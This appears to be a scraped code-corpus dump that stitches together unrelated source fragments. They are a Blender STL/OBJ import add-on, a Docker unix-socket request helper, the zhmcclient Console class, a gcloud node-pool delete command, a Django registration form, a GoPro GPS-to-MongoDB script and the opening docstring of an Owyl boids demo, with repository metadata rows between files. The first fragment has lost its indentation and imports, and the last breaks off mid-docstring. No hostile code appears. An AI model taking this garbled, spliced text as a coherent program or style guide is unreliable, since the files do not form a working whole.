from reynolds.dict.parser import ReynoldsFoamDict
from reynolds.foam.cmd_runner import FoamCmdRunner
# ------------------------------------------------------------------------
# operators
# ------------------------------------------------------------------------
def import_stl(self, context):
scene = context.scene
bpy.ops.import_mesh.stl(filepath=scene.stl_file_path,
axis_forward='Z',
axis_up='Y')
obj = scene.objects.active
print('active objects after import ', obj)
# -------------------------------------------------------------
# TBD : OBJ IS NONE, if multiple objects are added after import
# -------------------------------------------------------------
scene.geometries[obj.name] = {'file_path': scene.stl_file_path}
print('STL IMPORT: ', scene.geometries)
return {'FINISHED'}
def import_obj(self, context):
scene = context.scene
bpy.ops.import_scene.obj(filepath=scene.obj_file_path)
obj = scene.objects.active
print('active objects after import ', obj)
bpy.ops.object.transform_apply(location=False,
rotation=True,
scale=False)
# -------------------------------------------------------------
# TBD : OBJ IS NONE, if multiple objects are added after import
# -------------------------------------------------------------
scene.geometries[obj.name] = {'file_path': scene.obj_file_path}
print('OBJ IMPORT: ', scene.geometries)
return {'FINISHED'}
def add_geometry_block(self, context):
scene = context.scene
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
obj = scene.objects.active
# -------------------------
# Start the console operatorr
# --------------------------
bpy.ops.reynolds.of_console_op()
if obj is None:
self.report({'ERROR'}, 'Please select a geometry')
return {'FINISHED'}
bpy.ops.mesh.primitive_cube_add()
bound_box = bpy.context.active_object
dims = obj.dimensions
bound_box.dimensions = Vector((dims.x * 1.5, dims.y * 1.5, dims.z * 1.2))
bound_box.location = obj.location
bpy.ops.object.transform_apply(location=True,
rotation=True,
scale=True)
return {'FINISHED'}
class ModelsPanel(Panel):
bl_idname = "of_models_panel"
bl_label = "Import STL/OBJ Models"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Tools"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
row = layout.row()
row.operator(SearchableSphereAddOperator.bl_idname, text='Sphere',
icon='MESH_UVSPHERE')
row.operator(BlockMeshAddOperator.bl_idname, text='Box',
icon='META_CUBE')
# ----------------------------------------
# Render Models Panel using YAML GUI Spec
# ----------------------------------------
gui_renderer = ReynoldsGUIRenderer(scene, layout,
'models.yaml')
gui_renderer.render()
# ------------------------------------------------------------------------
# register and unregister
# ------------------------------------------------------------------------
def register():
register_classes(__name__)
set_scene_attrs('models.yaml')
create_custom_operators('models.yaml', __name__)
def unregister():
unregister_classes(__name__)
del_scene_attrs('models.yaml')
if __name__ == "__main__":
register()
| gpl-3.0 | -2,622,846,358,038,049,000 | 36.25731 | 79 | 0.501491 | false | 4.483462 | false | false | false |
rajdeepd/dockersamples | python/utils.py | 1 | 1545 | import httplib
import socket
import json
class UnixHTTPConnection(httplib.HTTPConnection):
"""
HTTPConnection object which connects to a unix socket.
"""
def __init__(self, sock_path):
httplib.HTTPConnection.__init__(self, "localhost")
self.sock_path = sock_path
def connect(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.sock_path)
class RequestHandler(object):
def __init__(self):
self.err_no = 0
def request(self, http_method, path, data):
self.err_no = 0
try:
conn = UnixHTTPConnection("/var/run/docker.sock")
conn.connect()
conn.request(http_method, path, body=json.dumps(data), headers={"Content-type": "application/json"})
response = conn.getresponse()
if response.status != 200:
self.err_no = response.status
return response.read()
except Exception as e:
self.err_no = -1
self.msg = str(e)
return str(e)
finally:
conn.close()
def has_error(self):
return (self.err_no != 0 and self.err_no != 200 and self.err_no != 204)
def printjson(jsonstr=None, obj=None):
if obj is None:
obj = json.loads(jsonstr)
print(json.dumps(obj, indent=2, sort_keys=True))
def paramstr_from_dict(params):
params_str = ""
for key in params.keys():
params_str += ("&" + key + "=" + str(params[key]))
return params_str
| gpl-2.0 | 7,247,339,961,896,200,000 | 25.186441 | 112 | 0.583819 | false | 3.777506 | false | false | false |
zhmcclient/python-zhmcclient | zhmcclient/_console.py | 1 | 28583 | # Copyright 2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A :term:`Console` resource represents an HMC.
In a paired setup with primary and alternate HMC, each HMC is represented as
a separate :term:`Console` resource.
"""
from __future__ import absolute_import
import time
from ._manager import BaseManager
from ._resource import BaseResource
from ._logging import logged_api_call
from ._utils import timestamp_from_datetime, divide_filter_args, matches_filters
from ._storage_group import StorageGroupManager
from ._storage_group_template import StorageGroupTemplateManager
from ._user import UserManager
from ._user_role import UserRoleManager
from ._user_pattern import UserPatternManager
from ._password_rule import PasswordRuleManager
from ._task import TaskManager
from ._ldap_server_definition import LdapServerDefinitionManager
from ._unmanaged_cpc import UnmanagedCpcManager
__all__ = ['ConsoleManager', 'Console']
class ConsoleManager(BaseManager):
"""
Manager providing access to the :term:`Console` representing the HMC this
client is connected to.
In a paired setup with primary and alternate HMC, each HMC is represented
as a separate :term:`Console` resource.
Derived from :class:`~zhmcclient.BaseManager`; see there for common methods
and attributes.
Objects of this class are not directly created by the user; they are
accessible via the following instance variable of a
:class:`~zhmcclient.Client` object:
* :attr:`zhmcclient.Client.consoles`
"""
def __init__(self, client):
# This function should not go into the docs.
# Parameters:
# client (:class:`~zhmcclient.Client`):
# Client object for the HMC to be used.
super(ConsoleManager, self).__init__(
resource_class=Console,
class_name='console',
session=client.session,
parent=None,
base_uri='/api/console',
oid_prop='object-id',
uri_prop='object-uri',
name_prop='name',
query_props=None,
list_has_name=False)
self._client = client
self._console = None
@property
def client(self):
"""
:class:`~zhmcclient.Client`:
The client defining the scope for this manager.
"""
return self._client
@property
def console(self):
"""
:class:`~zhmcclient.Console`:
The :term:`Console` representing the HMC this client is connected to.
The returned object is cached, so it is looked up only upon first
access to this property.
The returned object has only the following properties set:
* 'class'
* 'parent'
* 'object-uri'
Use :meth:`~zhmcclient.BaseResource.get_property` or
:meth:`~zhmcclient.BaseResource.prop` to access any properties
regardless of whether they are already set or first need to be
retrieved.
"""
if self._console is None:
self._console = self.resource_object('/api/console')
return self._console
@logged_api_call
def list(self, full_properties=True, filter_args=None):
"""
List the (one) :term:`Console` representing the HMC this client is
connected to.
Authorization requirements:
* None
Parameters:
full_properties (bool):
Controls whether the full set of resource properties should be
retrieved, vs. only a short set consisting of 'object-uri'.
filter_args (dict):
This parameter exists for consistency with other list() methods
and will be ignored.
Returns:
: A list of :class:`~zhmcclient.Console` objects, containing the one
:term:`Console` representing the HMC this client is connected to.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
uri = self._base_uri # There is only one console object.
if full_properties:
props = self.session.get(uri)
else:
# Note: The Console resource's Object ID is not part of its URI.
props = {
self._uri_prop: uri,
}
resource_obj = self.resource_class(
manager=self,
uri=props[self._uri_prop],
name=props.get(self._name_prop, None),
properties=props)
return [resource_obj]
class Console(BaseResource):
"""
Representation of a :term:`Console`.
Derived from :class:`~zhmcclient.BaseResource`; see there for common
methods and attributes.
Objects of this class are not directly created by the user; they are
returned from creation or list functions on their manager object
(in this case, :class:`~zhmcclient.ConsoleManager`).
"""
def __init__(self, manager, uri, name=None, properties=None):
# This function should not go into the docs.
# manager (:class:`~zhmcclient.ConsoleManager`):
# Manager object for this resource object.
# uri (string):
# Canonical URI path of the resource.
# name (string):
# Name of the resource.
# properties (dict):
# Properties to be set for this resource object. May be `None` or
# empty.
assert isinstance(manager, ConsoleManager), \
"Console init: Expected manager type %s, got %s" % \
(ConsoleManager, type(manager))
super(Console, self).__init__(manager, uri, name, properties)
# The manager objects for child resources (with lazy initialization):
self._storage_groups = None
self._storage_group_templates = None
self._users = None
self._user_roles = None
self._user_patterns = None
self._password_rules = None
self._tasks = None
self._ldap_server_definitions = None
self._unmanaged_cpcs = None
@property
def storage_groups(self):
"""
:class:`~zhmcclient.StorageGroupManager`:
Manager object for the Storage Groups in scope of this Console.
"""
# We do here some lazy loading.
if not self._storage_groups:
self._storage_groups = StorageGroupManager(self)
return self._storage_groups
@property
def storage_group_templates(self):
"""
:class:`~zhmcclient.StorageGroupTemplateManager`:
Manager object for the Storage Group Templates in scope of this
Console.
"""
# We do here some lazy loading.
if not self._storage_group_templates:
self._storage_group_templates = StorageGroupTemplateManager(self)
return self._storage_group_templates
@property
def users(self):
"""
:class:`~zhmcclient.UserManager`: Access to the :term:`Users <User>` in
this Console.
"""
# We do here some lazy loading.
if not self._users:
self._users = UserManager(self)
return self._users
@property
def user_roles(self):
"""
:class:`~zhmcclient.UserRoleManager`: Access to the
:term:`User Roles <User Role>` in this Console.
"""
# We do here some lazy loading.
if not self._user_roles:
self._user_roles = UserRoleManager(self)
return self._user_roles
@property
def user_patterns(self):
"""
:class:`~zhmcclient.UserPatternManager`: Access to the
:term:`User Patterns <User Pattern>` in this Console.
"""
# We do here some lazy loading.
if not self._user_patterns:
self._user_patterns = UserPatternManager(self)
return self._user_patterns
@property
def password_rules(self):
"""
:class:`~zhmcclient.PasswordRuleManager`: Access to the
:term:`Password Rules <Password Rule>` in this Console.
"""
# We do here some lazy loading.
if not self._password_rules:
self._password_rules = PasswordRuleManager(self)
return self._password_rules
@property
def tasks(self):
"""
:class:`~zhmcclient.TaskManager`: Access to the :term:`Tasks <Task>` in
this Console.
"""
# We do here some lazy loading.
if not self._tasks:
self._tasks = TaskManager(self)
return self._tasks
@property
def ldap_server_definitions(self):
"""
:class:`~zhmcclient.LdapServerDefinitionManager`: Access to the
:term:`LDAP Server Definitions <LDAP Server Definition>` in this
Console.
"""
# We do here some lazy loading.
if not self._ldap_server_definitions:
self._ldap_server_definitions = LdapServerDefinitionManager(self)
return self._ldap_server_definitions
@property
def unmanaged_cpcs(self):
"""
:class:`~zhmcclient.UnmanagedCpcManager`: Access to the unmanaged
:term:`CPCs <CPC>` in this Console.
"""
# We do here some lazy loading.
if not self._unmanaged_cpcs:
self._unmanaged_cpcs = UnmanagedCpcManager(self)
return self._unmanaged_cpcs
@logged_api_call
def restart(self, force=False, wait_for_available=True,
operation_timeout=None):
"""
Restart the HMC represented by this Console object.
Once the HMC is online again, this Console object, as well as any other
resource objects accessed through this HMC, can continue to be used.
An automatic re-logon will be performed under the covers, because the
HMC restart invalidates the currently used HMC session.
Authorization requirements:
* Task permission for the "Shutdown/Restart" task.
* "Remote Restart" must be enabled on the HMC.
Parameters:
force (bool):
Boolean controlling whether the restart operation is processed when
users are connected (`True`) or not (`False`). Users in this sense
are local or remote GUI users. HMC WS API clients do not count as
users for this purpose.
wait_for_available (bool):
Boolean controlling whether this method should wait for the HMC to
become available again after the restart, as follows:
* If `True`, this method will wait until the HMC has restarted and
is available again. The
:meth:`~zhmcclient.Client.query_api_version` method will be used
to check for availability of the HMC.
* If `False`, this method will return immediately once the HMC
has accepted the request to be restarted.
operation_timeout (:term:`number`):
Timeout in seconds, for waiting for HMC availability after the
restart. The special value 0 means that no timeout is set. `None`
means that the default async operation timeout of the session is
used. If the timeout expires when `wait_for_available=True`, a
:exc:`~zhmcclient.OperationTimeout` is raised.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
:exc:`~zhmcclient.OperationTimeout`: The timeout expired while
waiting for the HMC to become available again after the restart.
"""
body = {'force': force}
self.manager.session.post(self.uri + '/operations/restart', body=body)
if wait_for_available:
time.sleep(10)
self.manager.client.wait_for_available(
operation_timeout=operation_timeout)
@logged_api_call
def shutdown(self, force=False):
"""
Shut down and power off the HMC represented by this Console object.
While the HMC is powered off, any Python resource objects retrieved
from this HMC may raise exceptions upon further use.
In order to continue using Python resource objects retrieved from this
HMC, the HMC needs to be started again (e.g. by powering it on
locally). Once the HMC is available again, Python resource objects
retrieved from that HMC can continue to be used.
An automatic re-logon will be performed under the covers, because the
HMC startup invalidates the currently used HMC session.
Authorization requirements:
* Task permission for the "Shutdown/Restart" task.
* "Remote Shutdown" must be enabled on the HMC.
Parameters:
force (bool):
Boolean controlling whether the shutdown operation is processed
when users are connected (`True`) or not (`False`). Users in this
sense are local or remote GUI users. HMC WS API clients do not
count as users for this purpose.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
body = {'force': force}
self.manager.session.post(self.uri + '/operations/shutdown', body=body)
@logged_api_call
def make_primary(self):
"""
Change the role of the alternate HMC represented by this Console object
to become the primary HMC.
If that HMC is already the primary HMC, this method does not change its
rols and succeeds.
The HMC represented by this Console object must participate in a
{primary, alternate} pairing.
Authorization requirements:
* Task permission for the "Manage Alternate HMC" task.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
self.manager.session.post(self.uri + '/operations/make-primary')
@staticmethod
def _time_query_parms(begin_time, end_time):
"""Return the URI query paramterer string for the specified begin time
and end time."""
query_parms = []
if begin_time is not None:
begin_ts = timestamp_from_datetime(begin_time)
qp = 'begin-time={}'.format(begin_ts)
query_parms.append(qp)
if end_time is not None:
end_ts = timestamp_from_datetime(end_time)
qp = 'end-time={}'.format(end_ts)
query_parms.append(qp)
query_parms_str = '&'.join(query_parms)
if query_parms_str:
query_parms_str = '?' + query_parms_str
return query_parms_str
@logged_api_call
def get_audit_log(self, begin_time=None, end_time=None):
"""
Return the console audit log entries, optionally filtered by their
creation time.
Authorization requirements:
* Task permission to the "Audit and Log Management" task.
Parameters:
begin_time (:class:`~py:datetime.datetime`):
Begin time for filtering. Log entries with a creation time older
than the begin time will be omitted from the results.
If `None`, no such filtering is performed (and the oldest available
log entries will be included).
end_time (:class:`~py:datetime.datetime`):
End time for filtering. Log entries with a creation time newer
than the end time will be omitted from the results.
If `None`, no such filtering is performed (and the newest available
log entries will be included).
Returns:
:term:`json object`:
A JSON object with the log entries, as described in section
'Response body contents' of operation 'Get Console Audit Log' in
the :term:`HMC API` book.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms = self._time_query_parms(begin_time, end_time)
uri = self.uri + '/operations/get-audit-log' + query_parms
result = self.manager.session.get(uri)
return result
@logged_api_call
def get_security_log(self, begin_time=None, end_time=None):
"""
Return the console security log entries, optionally filtered by their
creation time.
Authorization requirements:
* Task permission to the "View Security Logs" task.
Parameters:
begin_time (:class:`~py:datetime.datetime`):
Begin time for filtering. Log entries with a creation time older
than the begin time will be omitted from the results.
If `None`, no such filtering is performed (and the oldest available
log entries will be included).
end_time (:class:`~py:datetime.datetime`):
End time for filtering. Log entries with a creation time newer
than the end time will be omitted from the results.
If `None`, no such filtering is performed (and the newest available
log entries will be included).
Returns:
:term:`json object`:
A JSON object with the log entries, as described in section
'Response body contents' of operation 'Get Console Security Log' in
the :term:`HMC API` book.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms = self._time_query_parms(begin_time, end_time)
uri = self.uri + '/operations/get-security-log' + query_parms
result = self.manager.session.get(uri)
return result
@logged_api_call
def list_unmanaged_cpcs(self, name=None):
"""
List the unmanaged CPCs of this HMC.
For details, see :meth:`~zhmcclient.UnmanagedCpc.list`.
Authorization requirements:
* None
Parameters:
name (:term:`string`):
Regular expression pattern for the CPC name, as a filter that
narrows the list of returned CPCs to those whose name property
matches the specified pattern.
`None` causes no filtering to happen, i.e. all unmanaged CPCs
discovered by the HMC are returned.
Returns:
: A list of :class:`~zhmcclient.UnmanagedCpc` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
filter_args = dict()
if name is not None:
filter_args['name'] = name
cpcs = self.unmanaged_cpcs.list(filter_args=filter_args)
return cpcs
@logged_api_call
def list_permitted_partitions(
self, full_properties=False, filter_args=None):
"""
List the permitted partitions of CPCs in DPM mode managed by this HMC.
*Added in version 1.0; requires HMC 2.14.0 or later*
Any CPCs in classic mode managed by the HMC will be ignored for this
operation.
The partitions in the result can be additionally limited by specifying
filter arguments.
Authorization requirements:
* Object permission to the partition objects included in the result.
Parameters:
full_properties (bool):
Controls whether the full set of resource properties for the
returned Partition objects should be retrieved, vs. only a short
set.
filter_args (dict):
Filter arguments for limiting the partitions in the result.
`None` causes no filtering to happen.
The following filter arguments are supported by server-side
filtering:
* name (string): Limits the result to partitions whose name
match the specified regular expression.
* type (string): Limits the result to partitions with a matching
"type" property value (i.e. "linux", "ssc", "zvm").
* status (string): Limits the result to partitions with a matching
"status" property value.
* has-unacceptable-status (bool): Limits the result to partitions
with a matching "has-unacceptable-status" property value.
* cpc-name (string): Limits the result to partitions whose CPC
has a name that matches the specified regular expression.
Any other valid property of partitions is supported by
client-side filtering:
* <property-name>: Any other property of partitions.
Returns:
: A list of :class:`~zhmcclient.Partition` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms, client_filters = divide_filter_args(
['name', 'type', 'status', 'has-unacceptable-status', 'cpc-name'],
filter_args)
# Perform the operation with the HMC, including any server-side
# filtering.
uri = self.uri + '/operations/list-permitted-partitions' + query_parms
result = self.manager.session.get(uri)
partition_objs = []
if result:
partition_items = result['partitions']
for partition_item in partition_items:
# The partition items have the following partition properties:
# * name, object-uri, type, status, has-unacceptable-status
# And the following properties for their parent CPC:
# * cpc-name (CPC property 'name')
# * cpc-object-uri (CPC property 'object-uri')
# * se-version (CPC property 'se-version')
# Create a 'skeleton' local Cpc object we can hang the
# Partition objects off of, even if the user does not have
# access permissions to these CPCs. Note that different
# partitions can have different parent CPCs.
cpc = self.manager.client.cpcs.find_local(
partition_item['cpc-name'],
partition_item['cpc-object-uri'],
{
'se-version': partition_item['se-version'],
},
)
partition_obj = cpc.partitions.resource_object(
partition_item['object-uri'],
{
'name': partition_item['name'],
'type': partition_item['type'],
'status': partition_item['status'],
'has-unacceptable-status':
partition_item['has-unacceptable-status'],
},
)
# Apply client-side filtering
if matches_filters(partition_obj, client_filters):
partition_objs.append(partition_obj)
if full_properties:
partition_obj.pull_full_properties()
return partition_objs
@logged_api_call
def list_permitted_lpars(
self, full_properties=False, filter_args=None):
"""
List the permitted LPARs of CPCs in classic mode managed by this HMC.
*Added in version 1.0; requires HMC 2.14.0 or later*
Any CPCs in DPM mode managed by the HMC will be ignored for this
operation.
The LPARs in the result can be additionally limited by specifying
filter arguments.
Authorization requirements:
* Object permission to the LPAR objects included in the result.
Parameters:
full_properties (bool):
Controls whether the full set of resource properties for the
returned LPAR objects should be retrieved, vs. only a short set.
filter_args (dict):
Filter arguments for limiting the LPARs in the result.
`None` causes no filtering to happen.
The following filter arguments are supported by server-side
filtering:
* name (string): Limits the result to LPARs whose name
match the specified regular expression.
* activation-mode (string): Limits the result to LPARs with a
matching "activation-mode" property value.
* status (string): Limits the result to LPARs with a matching
"status" property value.
* has-unacceptable-status (bool): Limits the result to LPARs
with a matching "has-unacceptable-status" property value.
* cpc-name (string): Limits the result to LPARs whose CPC
has a name that matches the specified regular expression.
Any other valid property of LPARs is supported by
client-side filtering:
* <property-name>: Any other property of LPARs.
Returns:
: A list of :class:`~zhmcclient.Lpar` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms, client_filters = divide_filter_args(
['name', 'type', 'status', 'has-unacceptable-status', 'cpc-name'],
filter_args)
# Perform the operation with the HMC, including any server-side
# filtering.
uri = self.uri + '/operations/list-permitted-logical-partitions' + \
query_parms
result = self.manager.session.get(uri)
lpar_objs = []
if result:
lpar_items = result['logical-partitions']
for lpar_item in lpar_items:
# The partition items have the following partition properties:
# * name, object-uri, activation-mode, status,
# has-unacceptable-status
# And the following properties for their parent CPC:
# * cpc-name (CPC property 'name')
# * cpc-object-uri (CPC property 'object-uri')
# * se-version (CPC property 'se-version')
# Create a 'skeleton' local Cpc object we can hang the
# Partition objects off of, even if the user does not have
# access permissions to these CPCs. Note that different
# partitions can have different parent CPCs.
cpc = self.manager.client.cpcs.find_local(
lpar_item['cpc-name'],
lpar_item['cpc-object-uri'],
{
'se-version': lpar_item['se-version'],
},
)
lpar_obj = cpc.lpars.resource_object(
lpar_item['object-uri'],
{
'name': lpar_item['name'],
'activation-mode': lpar_item['activation-mode'],
'status': lpar_item['status'],
'has-unacceptable-status':
lpar_item['has-unacceptable-status'],
},
)
# Apply client-side filtering
if matches_filters(lpar_obj, client_filters):
lpar_objs.append(lpar_obj)
if full_properties:
lpar_obj.pull_full_properties()
return lpar_objs
| apache-2.0 | 1,441,471,050,216,845,600 | 34.773467 | 80 | 0.599587 | false | 4.566704 | false | false | false |
flgiordano/netcash | +/google-cloud-sdk/lib/surface/container/nodepools/delete.py | 1 | 2953 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Delete node pool command."""
import argparse
from googlecloudsdk.calliope import actions
from googlecloudsdk.calliope import base
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Delete(base.Command):
"""Delete an existing node pool in a running cluster."""
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: An argparse.ArgumentParser-like object. It is mocked out in order
to capture some information, but behaves like an ArgumentParser.
"""
parser.add_argument(
'name',
metavar='NAME',
help='The name of the node pool to delete.')
parser.add_argument(
'--timeout',
type=int,
default=1800,
help=argparse.SUPPRESS)
parser.add_argument(
'--wait',
action='store_true',
default=True,
help='Poll the operation for completion after issuing a delete '
'request.')
parser.add_argument(
'--cluster',
help='The cluster from which to delete the node pool.',
action=actions.StoreProperty(properties.VALUES.container.cluster))
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
Some value that we want to have printed later.
"""
adapter = self.context['api_adapter']
pool_ref = adapter.ParseNodePool(args.name)
console_io.PromptContinue(
message=('The following node pool will be deleted.\n'
'[{name}] in cluster [{clusterId}] in zone [{zone}]')
.format(name=pool_ref.nodePoolId,
clusterId=pool_ref.clusterId,
zone=adapter.Zone(pool_ref)),
throw_if_unattended=True,
cancel_on_no=True)
# Make sure it exists (will raise appropriate error if not)
adapter.GetNodePool(pool_ref)
op_ref = adapter.DeleteNodePool(pool_ref)
if args.wait:
adapter.WaitForOperation(
op_ref,
'Deleting node pool {0}'.format(pool_ref.clusterId),
timeout_s=args.timeout)
log.DeletedResource(pool_ref)
return op_ref
| bsd-3-clause | -578,831,552,267,577,600 | 31.450549 | 79 | 0.675246 | false | 4.165021 | false | false | false |
gurovic/oluch2 | oluch/forms.py | 1 | 3254 | from django.utils.translation import ugettext_lazy as _
from django import forms
from django.contrib.auth.models import User
from oluch.models import Submit
class SubmitForm(forms.Form):
file = forms.FileField(label=_("Choose a file"))
user = forms.HiddenInput()
def __init__(self, choices, *args, **kwargs):
super(SubmitForm, self).__init__(*args, **kwargs)
self.fields['problem'] = forms.ChoiceField(choices, label=_("Problem"))
class UserInfoForm(forms.Form):
username = forms.SlugField(max_length=20, label=_("Login"), widget=forms.TextInput(attrs={'size':'40'}))
password1 = forms.SlugField(max_length=20, widget=forms.PasswordInput(attrs={'size':'40'}), label=_("Password"))
password2 = forms.SlugField(max_length=20, widget=forms.PasswordInput(attrs={'size':'40'}), label=_("Password again"))
lastname = forms.CharField(max_length=100, required=False, label=_("Last name"), widget=forms.TextInput(attrs={'size':'40'}))
firstname = forms.CharField(max_length=100, required=False, label=_("Given name"), widget=forms.TextInput(attrs={'size':'40'}))
grade = forms.CharField(max_length=1000, required=True, label=_("Grade"), widget=forms.TextInput(attrs={'size':'40'}))
school = forms.CharField(max_length=1000, required=True, label=_("School"), widget=forms.TextInput(attrs={'size':'40'}))
maxgrade = forms.CharField(max_length=1000, required=True, label=_("The last grade at your high school"), widget=forms.TextInput(attrs={'size':'40'}))
city = forms.CharField(max_length=1000, required=True, label=_("City/settlement"), widget=forms.TextInput(attrs={'size':'40'}))
country = forms.CharField(max_length=1000, required=True, label=_("Country"), widget=forms.TextInput(attrs={'size':'40'}))
def clean(self):
'''Required custom validation for the form.'''
super(forms.Form, self).clean()
if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password2']:
self._errors['password'] = [_('Passwords must match.')]
self._errors['password_confirm'] = [_('Passwords must match.')]
try:
if set(self.cleaned_data["username"]) - set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'):
self._errors['username'] = [_('Bad login.')]
elif User.objects.filter(username=self.cleaned_data["username"]).count() > 0:
self._errors['username'] = [_('User with such username already exists.')]
except:
self._errors['username'] = [_('Bad login.')]
try:
int(self.cleaned_data['grade'])
except:
self._errors['grade'] = [_('Grade must be a number.')]
try:
int(self.cleaned_data['maxgrade'])
except:
self._errors['maxgrade'] = [_('Grade must be a number.')]
self.cleaned_data['lastname'] = self.cleaned_data['lastname'][0].upper() + self.cleaned_data['lastname'][1:]
self.cleaned_data['firstname'] = self.cleaned_data['firstname'][0].upper() + self.cleaned_data['firstname'][1:]
return self.cleaned_data | gpl-2.0 | -6,291,880,909,630,117,000 | 54.413793 | 154 | 0.63614 | false | 3.992638 | false | false | false |
DenisCarriere/gopro | examples/open_csv.py | 1 | 1419 | import os
import csv
import time
from datetime import datetime
from datetime import timedelta
from dateutil import parser
import exifread
from pymongo import MongoClient
client = MongoClient()
root = '/home/ubuntu/Pictures/GoPro/'
client.gopro.gpx.remove({})
client.gopro.photos.remove({})
with open(root + 'Gopro2.csv') as f:
first_line = f.readline().strip()
if first_line == '"Name","Activity type","Description"':
# Skip 2nd & 3rd line also
f.readline()
f.readline()
else:
pass
# Read CSV
reader = csv.DictReader(f)
for line in reader:
delta = timedelta(0, 60*60*5)
dt = parser.parse(line['Time']) - delta
store = {
'lat': line['Latitude (deg)'],
'lng': line['Longitude (deg)'],
'dt': dt,
'bearing': line['Bearing (deg)'],
'altitude': line['Altitude (m)'],
'accuracy': line['Accuracy (m)']
}
client.gopro.gpx.save(store)
# Read Photos
for filename in os.listdir(root):
if '.JPG' in filename:
path = root + filename
with open(path) as f:
tags = exifread.process_file(f)
dt = parser.parse(str(tags['EXIF DateTimeOriginal']))
store = {
'dt': dt,
'filename': filename,
'path': path,
}
client.gopro.photos.save(store) | mit | 5,475,434,421,845,267,000 | 25.792453 | 65 | 0.554616 | false | 3.704961 | false | false | false |
eykd/owyl | examples/boids.py | 2 | 19512 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""boids -- Boids implementation using Owyl behavior trees.
This module provides example code using the L{owyl} library to
implement the Boids flocking algorithm.
Requirements
============
Note: this demo requires Pyglet, Rabbyt, cocos2d
- B{Pyglet}: U{http://pypi.python.org/pypi/pyglet}
- B{Rabbyt}: U{http://pypi.python.org/pypi/Rabbyt}
- B{cocos}: U{http://cocos2d.org/}
Intent
======
This example demonstrates the basic usage of Owyl, including:
- building and running a Behavior Tree, and
- developing custom behaviors.
Definitions
===========
- B{behavior}: Any unit of a Behavior Tree, as represented by a task
node, branch, or group of parallel behaviors.
- B{task node}: Any atomic Behavior Tree node.
- B{parent node}/B{parent task}: Any task node that has child nodes.
- B{branch}: A parent node and all its children.
- B{node decorator}: A parent node with only one child. Used to add
functionality to a child.
- B{leaf node}/B{leaf task}/B{leaf}: A task node that has no children.
Algorithm
=========
The basic Boids flocking algorithm was developed by Craig
Reynolds. For more information, see his page at
U{http://www.red3d.com/cwr/boids/}.
It's a very simple algorithm, with three basic behaviors:
- "B{Separation}: steer to avoid crowding local flockmates"
- "B{Alignment}: steer towards the average heading of local flockmates"
- "B{Cohesion}: steer to move toward the average position of local
flockmates"
I{(Definitions from C. Reynolds, linked above)}
This is actually so simple, we wouldn't really need a behavior tree
to model it, but it's a good place to start.
Just to spice things up, we've added some extra behavior: boids will
accelerate as they steer away from too-close flock mates, and they
will seek to match a global speed. This gives the flock more the
appearance of a school of fish, rather than a flight of sparrows, but
it will let us break out some slightly more advanced behaviors.
The boids will also seek after a fixed point (conveniently, the center
of the screen), so that we can observe their movement better.
Building the Tree
=================
See L{Boid.buildTree} below.
Core Behaviors
==============
The core behaviors are documented below in each task nodes'
docstring. They are:
- L{Boid.hasCloseNeighbors}: conditional to detect crowding
- L{Boid.accelerate}: accelerate at a given rate
- L{Boid.matchSpeed}: accelerate to match a given speed
- L{Boid.move}: move straight ahead at current speed
- L{Boid.seek}: seek a fixed goal position
- L{Boid.steerToMatchHeading}: match neighbors' average heading
- L{Boid.steerForSeparation}: steer away from close flockmates
